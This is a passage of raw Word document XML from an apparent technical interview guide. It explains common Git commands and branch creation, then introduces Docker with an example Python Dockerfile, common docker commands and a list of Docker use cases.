    <w:p w14:paraId="286D34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8. git remote</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0093E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anages the remote repositories that your local repository tracks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4583BD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lastRenderedPageBreak/>
        <w:t>Usage</w:t>
      </w:r>
      <w:r w:rsidRPr="00324FFB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: You can use this command to view, add, or remove remotes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A10E6A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v         # Shows the remotes for the repository</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="256E42B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add origin https://github.com/user/repository.git   # Adds a remote repository</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1201D4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remove origin    # Removes a remote repository</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B47B54D"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73B0C">
          <v:rect id="_x0000_i3603" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3903326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9. git cherry-pick</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB059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pplies a specific commit from one branch onto another.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A72E26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when you want to apply a specific commit from one branch to another without merging the entire branch.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="546428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rry-pick commit_id    # Applies a single commit to the current branch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="216D524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0. git clean</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79FB17A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moves untracked files from the working directory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C67C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ful to clean up your working directory by removing files that are not being tracked by Git.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A3A5B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              # Removes untracked files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2618A4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d             # Removes untracked files and directories</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A673412"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0F402">
          <v:rect id="_x0000_i3604" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="044562A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1. git log --graph</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E7029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Visualizes the commit history in a graphical format.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D5AB40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Helps in understanding the branch structure and merges in the commit history.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB9E0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graph --oneline   # Visualizes commit history with a graph</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E7E01B"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DB07F">
          <v:rect id="_x0000_i3605" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E8D3A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ese are some of the essential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606" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="378E185A" w14:textId="66F0595B" w:rsidR="00D70F52" w:rsidRPr="00CE4B95" w:rsidRDefault="006B0450">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="891" w:name="_Toc197868105"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the Git command to create a new branch from an existing branch</w:t>
      </w:r>
      <w:r w:rsidR="00D70F52" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="891"/>
    </w:p>
    <w:p w14:paraId="7D6B315A" w14:textId="287CE16D" w:rsidR="00CA2729" w:rsidRPr="00324FFB" w:rsidRDefault="00CA2729" w:rsidP="00FC2EFF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="710"/>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create a new branch from an existing branch in Git, you can use the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14514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existing-branch-name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D8FAE1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planation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C16CA5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Creates a new branch with the name new-branch-name and switches to it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="715DAD4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isting-branch-name: Specifies the branch you are branching from. If you don't provide an existing branch name, Git will create the new branch from the current branch.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31CE04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lternatively, you can use this sequence of commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="479C89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out the existing branch:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B60DF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existing-branch-name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E78E4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 and switch to the new branch:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ED733D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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50EDC6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will create the new branch based on the specified existing-branch-name.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="185D2585" w14:textId="0C53854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607" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE34E79" w14:textId="3B337B5F" w:rsidR="00D70F52" w:rsidRPr="00CE4B95" w:rsidRDefault="00D70F52" w:rsidP="000C6CF9">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BB66381" w14:textId="1CADA6C3" w:rsidR="006C0B8D" w:rsidRPr="00CE4B95" w:rsidRDefault="006C0B8D" w:rsidP="007C26E7">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="892" w:name="_Toc197868106"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Docker</w:t>
      </w:r>
      <w:bookmarkEnd w:id="892"/>
    </w:p>
    <w:p w14:paraId="785DA573" w14:textId="77777777" w:rsidR="00145166" w:rsidRPr="00CE4B95" w:rsidRDefault="00145166" w:rsidP="00145166">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="057ED3DB" w14:textId="4C0FFF12" w:rsidR="00145166" w:rsidRPr="00CE4B95" w:rsidRDefault="00145166" w:rsidP="00145166">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="893" w:name="_Toc197868107"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is Docker?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="893"/>
    </w:p>
    <w:p w14:paraId="607AE511" w14:textId="0296F8F5" w:rsidR="004435BE" w:rsidRPr="00B5655D" w:rsidRDefault="004435BE" w:rsidP="00FC2EFF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="710"/>
        </w:num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Key Concepts of Docker:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="110A52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tainerization</w:t>
      </w:r>
      <w:r w:rsidRPr="00B5655D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="540F8881"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Images</w:t>
      </w:r>
      <w:r w:rsidRPr="00B5655D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D433DA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image is a lightweight, stand-alone, executable package that includes everything needed to run a piece of software (code, runtime, libraries, environment variables, etc.).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A22AB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mages are immutable, meaning once created, they don't change. To modify an image, a new one must be created.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="734E1EB3"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ntainers</w:t>
      </w:r>
      <w:r w:rsidRPr="00B5655D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16FC9FE8"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container is a running instance of a Docker image. It is an isolated process that runs in user space on the host machine and can be started, stopped, and restarted as needed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="748F49E4"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share the host operating system's kernel but run in isolated environments with their own filesystem, processes, and network stack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38129C0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file</w:t>
      </w:r>
      <w:r w:rsidRPr="00B5655D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF877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Hub</w:t>
      </w:r>
      <w:r w:rsidRPr="00B5655D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E11459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mpose</w:t>
      </w:r>
      <w:r w:rsidRPr="00B5655D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB70465"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Advantages of Docker:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A71BB9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Portability</w:t>
      </w:r>
      <w:r w:rsidRPr="00B5655D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38368D70"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sistency</w:t>
      </w:r>
      <w:r w:rsidRPr="00B5655D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7397417A"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nsures that the application will run the same way in any environment, making it easier to test and deploy software.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CB7CCC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Isolation</w:t>
      </w:r>
      <w:r w:rsidRPr="00B5655D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="023882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ach container runs in isolation, so it doesn’t interfere with other applications or services running on the same host. This ensures that dependencies or environment variables don't clash.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE4110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calability</w:t>
      </w:r>
      <w:r w:rsidRPr="00B5655D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="646E6E32"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makes it easy to scale applications by running multiple containers for different components, managing them with orchestration tools like Kubernetes or Docker Swarm.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B86628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Efficiency</w:t>
      </w:r>
      <w:r w:rsidRPr="00B5655D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D7EEA99"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are lightweight compared to virtual machines, sharing the host OS kernel, and providing faster start-up times and lower overhead.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38FADEB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Docker Workflow:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B3E614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Write a Dockerfile</w:t>
      </w:r>
      <w:r w:rsidRPr="00B5655D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Create a file named Dockerfile to specify the base image and steps to build your app.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7325C77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Build the Image</w:t>
      </w:r>
      <w:r w:rsidRPr="00B5655D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Use the docker build command to build an image from the Dockerfile.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B62EE3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Run a Container</w:t>
      </w:r>
      <w:r w:rsidRPr="00B5655D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Use the docker run command to run a container from the image.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D5870F1"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hare the Image</w:t>
      </w:r>
      <w:r w:rsidRPr="00B5655D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Push the image to Docker Hub or any other repository for sharing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F1AEA8"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of a Simple Dockerfile:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C64C7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Use an official Python runtime as a parent image</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="306FEDD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FROM python:3.8-slim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5104E42B" w14:textId="77777777" w:rsidR="004435BE" w:rsidRPr="00B5655D" w:rsidRDefault="004435BE" w:rsidP="00B5655D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43B217E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Set the working directory in the container</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="224B70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WORKDIR /app</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="432B9791" w14:textId="77777777" w:rsidR="004435BE" w:rsidRPr="00B5655D" w:rsidRDefault="004435BE" w:rsidP="00B5655D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A62646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Copy the current directory contents into the container</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB37FC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Y . /app</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="203957D9" w14:textId="77777777" w:rsidR="004435BE" w:rsidRPr="00B5655D" w:rsidRDefault="004435BE" w:rsidP="00B5655D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52EBEA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Install any needed packages specified in requirements.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9F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 pip install --no-cache-dir -r requirements.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F941475" w14:textId="77777777" w:rsidR="004435BE" w:rsidRPr="00B5655D" w:rsidRDefault="004435BE" w:rsidP="00B5655D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EE1C40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Make port 5000 available to the world outside this container</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56299C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 5000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1565CC8B" w14:textId="77777777" w:rsidR="004435BE" w:rsidRPr="00B5655D" w:rsidRDefault="004435BE" w:rsidP="00B5655D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D64B5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Define environment variable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B93FADF"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NV NAME World</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="170BEACC" w14:textId="77777777" w:rsidR="004435BE" w:rsidRPr="00B5655D" w:rsidRDefault="004435BE" w:rsidP="00B5655D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F3B46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Run app.py when the container launches</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="601C385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MD ["python", "app.py"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A9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This Dockerfile:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D35FFB4" w14:textId="13284A8F"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Uses an official Python image.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9F87D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ets the working directory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="222B08B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ies the application code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67FA24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nstalls the required Python packages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0257426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s port 5000.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="689B459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s the app.py file when the container starts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C928A5"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Common Docker Commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B28FF4E" w14:textId="677CE33B" w:rsidR="004435BE" w:rsidRPr="00B5655D" w:rsidRDefault="00FA1B35"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xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004435BE" w:rsidRPr="00B5655D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>docker build -t my-image .: Builds a Docker image from the Dockerfile in the current directory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED74A7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run -p 4000:5000 my-image: Runs a container from the image my-image and maps port 5000 inside the container to port 4000 on the host machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4450D6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ps: Lists all running containers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C45B93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stop &lt;container_id&gt;: Stops a running container.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49DE988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xec -it &lt;container_id&gt; /bin/bash: Opens a shell inside a running container.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E891CEB" w14:textId="18A5ACDD"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608" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="58549418" w14:textId="4E66FB31" w:rsidR="00B21219" w:rsidRPr="00CE4B95" w:rsidRDefault="00504A73">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="894" w:name="_Toc197868108"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain use cases of Docker</w:t>
      </w:r>
      <w:r w:rsidR="00B21219" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="894"/>
    </w:p>
    <w:p w14:paraId="6F4F4052" w14:textId="77FE30D9" w:rsidR="006E34CD" w:rsidRPr="009156EA" w:rsidRDefault="006E34CD"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ocker has a wide range of </w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>real-world use cases</w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that solve common software development, deployment, and operations challenges. Here are the most common and powerful use cases of Docker:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E6380ED"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0C38C">
          <v:rect id="_x0000_i3609" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A55D6BE"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 Simplified Application Deployment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1C1E47"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an application with all dependencies into a container image.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C248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Java Spring Boot app along with its JDK, configs, and libraries is packaged and deployed anywhere (dev, test, prod) without any compatibility issues.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F6FFDD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xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>"Works on my machine"</w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> problems are eliminated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26694C37"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FAC194">
          <v:rect id="_x0000_i3610" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="309D952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2. Test Automation &amp; CI/CD Pipelines</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2870A5D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automated tests and builds in isolated environments using containers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0497997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Jenkins pipeline running unit tests, integration tests, and deploying containers to a staging environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E7ABC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Consistent, fast, and reliable build/test environments across teams.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B5853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11DF0">
          <v:rect id="_x0000_i3611" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC4C1B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3. Microservices Architecture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D47389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microservices independently in isolated containers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20527616"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n e-commerce app with services like cart, inventory, order, and payment — each running in its own container.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1688E82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asy scalability, individual service deployment, and isolation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D4023C6"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464B7E">
          <v:rect id="_x0000_i3612" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A92E75"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w:t>
      </w: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4. Developer Environment Setup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35681BF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lastRenderedPageBreak/>
        <w:t>Use Case</w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
